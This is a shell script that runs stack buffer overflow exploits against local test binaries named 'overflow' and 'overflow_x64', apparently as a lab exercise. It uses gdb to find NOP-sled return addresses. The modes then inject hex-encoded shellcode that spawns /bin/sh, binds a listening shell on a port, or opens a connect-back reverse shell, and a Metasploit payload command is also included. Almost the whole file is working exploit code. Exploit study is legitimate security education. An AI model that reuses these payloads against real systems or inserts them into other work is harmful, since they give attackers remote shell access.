#!/bin/sh

# generate shellcode with metasploit (exec /bin/sh):
#   ./msfpayload linux/x86/exec cmd=/bin/sh R | ./msfencode -b '\x00\x09\x0a\x0d\x1b\x20'
# currently only self-written shellcode is used (see the shellcode/*.asm files named below); the metasploit command above is not used by this script.


DIR="$(dirname $0)"

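#######################################
# Pick a return address for the 32-bit target.
# Runs the binary under gdb with the given input; the gdb script dump32.gdb
# (not shown here) is expected to print memory as "<adr>: word word word word"
# lines.  Every line whose four words are 0x90909090 (16 bytes of NOPs) yields
# a candidate address; the candidates are sorted and the $3-th one (1-based)
# is printed as a little-endian "\xNN\xNN\xNN\xNN" string.
# Globals:   DIR (read) - directory holding dump32.gdb
# Arguments: $1 - path to the binary
#            $2 - input string, passed to the binary as ONE argument
#            $3 - 1-based index into the sorted candidate list
# Outputs:   the escaped address on stdout; diagnostics go to stderr so they
#            can never be captured as if they were an address
# Returns:   0 on success, 1 on missing arguments, no candidate, a bad index
#            or a candidate that is not an 8-digit hex address
#######################################
find_return_adr32() {
	if [ -z "$1" ] || [ -z "$2" ] || [ -z "$3" ]; then
		return 1
	fi
	# "$2" is one argv entry; unquoted it would be word-split and globbed.
	# gdb's own exit status is ignored; an empty dump is caught below.
	ret=$(gdb -batch -x "${DIR}/dump32.gdb" --args "$1" "$2")
	adr=$(printf '%s\n' "${ret}" | sed -n 's/\(.*\):\s\+0x90909090\s\+0x90909090\s\+0x90909090\s\+0x90909090/\1/p' | sort)
	# The pipeline's status is sort's, which is 0 even when nothing matched,
	# so the captured text is tested instead of $?.
	if [ -z "${adr}" ]; then
		printf '%s: no adr found: %s\n' "$0" "${adr}" >&2
		return 1
	fi
	# Join the candidates with spaces and select field $3 (same indexing as
	# the original cut-based selection); cut fails on a non-numeric index.
	chs=$(printf '%s\n' "${adr}" | tr '\n' ' ' | cut -d ' ' -f "$3") || chs=
	if [ -z "${chs}" ]; then
		printf '%s: check adr index: %s\n' "$0" "$3" >&2
		return 1
	fi
	# Normalise to exactly 8 hex digits: gdb omits leading zeros, which made
	# the fixed-width byte swap below miss addresses such as 0x0804xxxx, and
	# printf rejects anything that is not a number.
	if ! hex=$(printf '%08x' "${chs}" 2>/dev/null) || [ "${#hex}" -ne 8 ]; then
		printf '%s: bad adr: %s\n' "$0" "${chs}" >&2
		return 1
	fi
	# Byte-swap into little-endian "\xNN" escapes.  printf rather than echo,
	# so no echo flavour reinterprets the backslashes.
	printf '%s\n' "${hex}" | sed 's/\(..\)\(..\)\(..\)\(..\)/\\x\4\\x\3\\x\2\\x\1/'
	return 0
}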

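#######################################
# Pick a return address for the 64-bit target.
# Same procedure as find_return_adr32 but with dump64.gdb and an 8-byte
# little-endian result.  The byte swap is done with printf/sed instead of a
# python2.7 here-document, so this step no longer needs python2.7 and the
# gdb-derived value is no longer interpolated into Python source.
# Globals:   DIR (read) - directory holding dump64.gdb
# Arguments: $1 - path to the binary
#            $2 - input string, passed to the binary as ONE argument
#            $3 - 1-based index into the sorted candidate list
# Outputs:   "\xNN" x8 on stdout; diagnostics on stderr
# Returns:   0 on success, 1 on missing arguments, no candidate, a bad index
#            or a candidate that is not a hex address of at most 16 digits
#######################################
find_return_adr64() {
	if [ -z "$1" ] || [ -z "$2" ] || [ -z "$3" ]; then
		return 1
	fi
	# "$2" is one argv entry; unquoted it would be word-split and globbed.
	# gdb's own exit status is ignored; an empty dump is caught below.
	ret=$(gdb -batch -x "${DIR}/dump64.gdb" --args "$1" "$2")
	adr=$(printf '%s\n' "${ret}" | sed -n 's/\(.*\):\s\+0x90909090\s\+0x90909090\s\+0x90909090\s\+0x90909090/\1/p' | sort)
	# sort's status is 0 even when nothing matched; test the text instead.
	if [ -z "${adr}" ]; then
		printf '%s: no adr found: %s\n' "$0" "${adr}" >&2
		return 1
	fi
	# Join the candidates with spaces and select field $3 (1-based).
	chs=$(printf '%s\n' "${adr}" | tr '\n' ' ' | cut -d ' ' -f "$3") || chs=
	if [ -z "${chs}" ]; then
		printf '%s: check adr index: %s\n' "$0" "$3" >&2
		return 1
	fi
	# Pad to 16 hex digits (gdb omits leading zeros) and reject non-numbers.
	# The previous repr()[1:33] slice emitted printable bytes such as 0x41
	# as a bare character plus a stray quote; every byte is now "\xNN".
	if ! hex=$(printf '%016x' "${chs}" 2>/dev/null) || [ "${#hex}" -ne 16 ]; then
		printf '%s: bad adr: %s\n' "$0" "${chs}" >&2
		return 1
	fi
	# Byte-swap the 8 bytes into little-endian "\xNN" escapes.
	printf '%s\n' "${hex}" | sed 's/\(..\)\(..\)\(..\)\(..\)\(..\)\(..\)\(..\)\(..\)/\\x\8\\x\7\\x\6\\x\5\\x\4\\x\3\\x\2\\x\1/'
	return 0
}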

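# Both target binaries must already be built (the message tells the user to
# run make); abort before any gdb probing if either is missing.  The
# deprecated "-o" inside a single [ ] is replaced by two tests joined with ||,
# and the diagnostic goes to stderr.
if [ ! -f "${DIR}/overflow" ] || [ ! -f "${DIR}/overflow_x64" ]; then
	printf '%s: run make first!\n' "$0" >&2
	exit 1
fi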

# Probe both binaries under gdb (dump32.gdb / dump64.gdb) for a stack address
# whose next 16 bytes are all 0x90, and keep the 3rd sorted candidate as a
# little-endian "\x.." string that local32/local64 splice into their payloads.
# NOTE(review): both probes run unconditionally, before the usage check and
# even for the bind*/connect32 modes that never use the result.
# NOTE(review): the 32-bit probe layout (117 NOPs + shellcode + 154 NOPs)
# differs from the local32 payload below (158 + shellcode + 117 + address);
# confirm the probed address is still valid for the real layout.
RETURN_ADR_OVERFLOW32=$(find_return_adr32 "${DIR}/overflow" "$(python2.7 -c 'print "\x90"*117 + "\x31\xc0\x31\xdb\x31\xc9\x99\xeb\x08\x5b\x88\x43\x07\xb0\x0b\xcd\x80\xe8\xf3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" + "\x90"*154')" 3)
RETURN_ADR_OVERFLOW64=$(find_return_adr64 "${DIR}/overflow_x64" "$(python2.7 -c 'print "\x90"*133 + "\xeb\x13\x48\x31\xc0\x5f\x88\x47\x07\x57\x48\x89\xe6\x50\x48\x89\xe2\xb0\x3b\x0f\x05\xe8\xe8\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\xff" + "\x90"*153 + ""')" 3)


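# No mode given: print the usage line and stop.  Written to stderr so that a
# caller capturing stdout cannot mistake it for program output.
if [ -z "$1" ]; then
	printf '%s [local32|local64|bind32|bind64|connect32]\n' "$0" >&2
	exit 1
fi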

# Dispatch on the mode argument.  local32/local64 run the target under gdb
# with the address probed above; bind32/bind64/connect32 run the target
# directly with a return address that is hard-coded in the payload.
# NOTE(review): the targets are invoked as ./overflow and ./overflow_x64
# relative to the current directory, while the existence check above uses
# "${DIR}/..." — confirm the script is meant to be run from its own directory.
# NOTE(review): every payload is passed through an unquoted $(...) or backtick
# substitution, so it is subject to word-splitting and globbing by the shell.
if [ "$1" = "local32" ]; then

	# NOPsled(158) + shellcode(70) + NOPsled(117) + return_addr(4)
	# uses own shellcode: shellcode/hello.asm (x86-nasm)
	# The address string is spliced into the python literal by closing the
	# shell single quotes around ${RETURN_ADR_OVERFLOW32}.
	echo "$0: using return adr: ${RETURN_ADR_OVERFLOW32}"
	gdb -ex r --args ./overflow $(python2.7 -c 'print "\x90"*158 + "\x31\xc0\x31\xdb\x31\xc9\x99\xeb\x08\x5b\x88\x43\x07\xb0\x0b\xcd\x80\xe8\xf3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" + "\x90"*117 +"'${RETURN_ADR_OVERFLOW32}'"')

elif [ "$1" = "local64" ]; then

	# NOPsled(133) + shellcode(34) + NOPsled(145) + return_addr(8)
	# uses own shellcode: shellcode/execve_x64.o
	echo "$0: using return adr: ${RETURN_ADR_OVERFLOW64}"
	gdb -ex r --args ./overflow_x64 $(python2.7 -c 'print "\x90"*133 + "\xeb\x13\x48\x31\xc0\x5f\x88\x47\x07\x57\x48\x89\xe6\x50\x48\x89\xe2\xb0\x3b\x0f\x05\xe8\xe8\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\xff" + "\x90"*145 + "'${RETURN_ADR_OVERFLOW64}'"')

elif [ "$1" = "bind32" ]; then

	# 85xNOP + shellcode(134) + 85xNOP + return addr
	# uses own shellcode: shellcode/socket.asm (x86-nasm)
	# NOTE(review): the return address is hard-coded here, unlike local32
	# which uses ${RETURN_ADR_OVERFLOW32}; the same applies to bind64 and
	# connect32 below.
	./overflow `python2.7 -c 'print "\x90"*85 + "\x31\xc0\x31\xdb\x50\xb3\x01\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x89\xc2\x31\xc0\x50\x66\x68\xaa\x11\x66\x6a\x02\x89\xe1\x6a\x10\x51\x52\x89\xe1\x31\xdb\xb3\x02\xb0\x66\xcd\x80\x31\xc0\x50\x52\x89\xe1\xb0\x66\x31\xdb\xb3\x04\xcd\x80\x31\xc0\x50\x66\x50\x66\x6a\x02\x89\xe1\x6a\x10\x54\x51\x52\x89\xe1\x31\xdb\xb3\x05\xb0\x66\xcd\x80\x31\xc9\xb1\x03\x89\xc3\x31\xc0\xb0\x3f\xfe\xc9\xcd\x80\xfe\xc1\xe2\xf4\x31\xc0\x31\xc9\x99\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x88\x44\x24\x08\xb0\x0b\xcd\x80\xb0\x01\x31\xdb\xb3\x42\xcd\x80" + "\x90"*85 + "\xc4\xf2\xff\xbf"'`

elif [ "$1" = "bind64" ]; then

	# 100xNOP + shellcode(149) + 63xNOP + return addr
	# uses own shellcode: shellcode/socket_x64.asm (x64-nasm)
	./overflow_x64 `python2.7 -c 'print "\x90"*100 + "\x48\x31\xc0\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x40\xb7\x02\x40\xb6\x01\xb0\x29\x0f\x05\x48\x89\xc7\x48\x31\xc0\x50\x66\x68\xaa\x11\x66\x6a\x02\x48\x89\xe6\xb2\x10\xb0\x31\x0f\x05\x48\x31\xc0\x48\x31\xf6\xb0\x32\x0f\x05\x48\x31\xc0\x50\x66\x68\xaa\x11\x66\x6a\x02\x48\x89\xe6\x6a\x10\x48\x89\xe2\xb0\x2b\x0f\x05\x48\x89\xc7\x48\x31\xd2\xb2\x03\x48\x89\xd6\x48\xff\xce\x48\x31\xc0\xb0\x21\x0f\x05\xfe\xca\x75\xef\x48\xb8\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x50\x48\x31\xc0\x88\x44\x24\x08\x48\x89\xe7\x50\x48\x89\xe6\x50\x48\x89\xe2\xb0\x3b\x0f\x05\x48\x31\xc0\x48\x31\xff\x40\xb7\x42\xb0\x3c\x0f\x05"  + "\x90"*63 + "\x02\xe7\xff\xff\xff\x7f"'`

elif [ "$1" = "connect32" ]; then

	# 97 bytes NOP + 110 bytes shellcode + 97 bytes NOP + return addr
	# uses own shellcode: shellcode/connect.asm (x86-nasm)
	./overflow `python2.7 -c 'print "\x90"*97 + "\x31\xc0\x31\xdb\x50\xb3\x01\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x89\xc2\x31\xc0\x68\x6e\x11\x11\x10\x81\x34\x24\x11\x11\x11\x11\x66\x68\x14\x28\x66\x81\x34\x24\x11\x11\x66\x6a\x02\x89\xe1\x6a\x10\x51\x52\x89\xe1\xb3\x03\xb0\x66\xcd\x80\x31\xc9\xb1\x03\x89\xd3\x31\xc0\xb0\x3f\xfe\xc9\xcd\x80\xfe\xc1\xe2\xf4\x31\xc0\x31\xc9\x99\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x88\x44\x24\x08\xb0\x0b\xcd\x80\xb0\x01\x31\xdb\xb3\x42\xcd\x80" +"\x90"*97 + "\xc4\xf2\xff\xbf"'`

else
	# Unknown mode: re-run the script without arguments so the usage line
	# from the check above is printed (this also repeats the gdb probing).
	$0
fi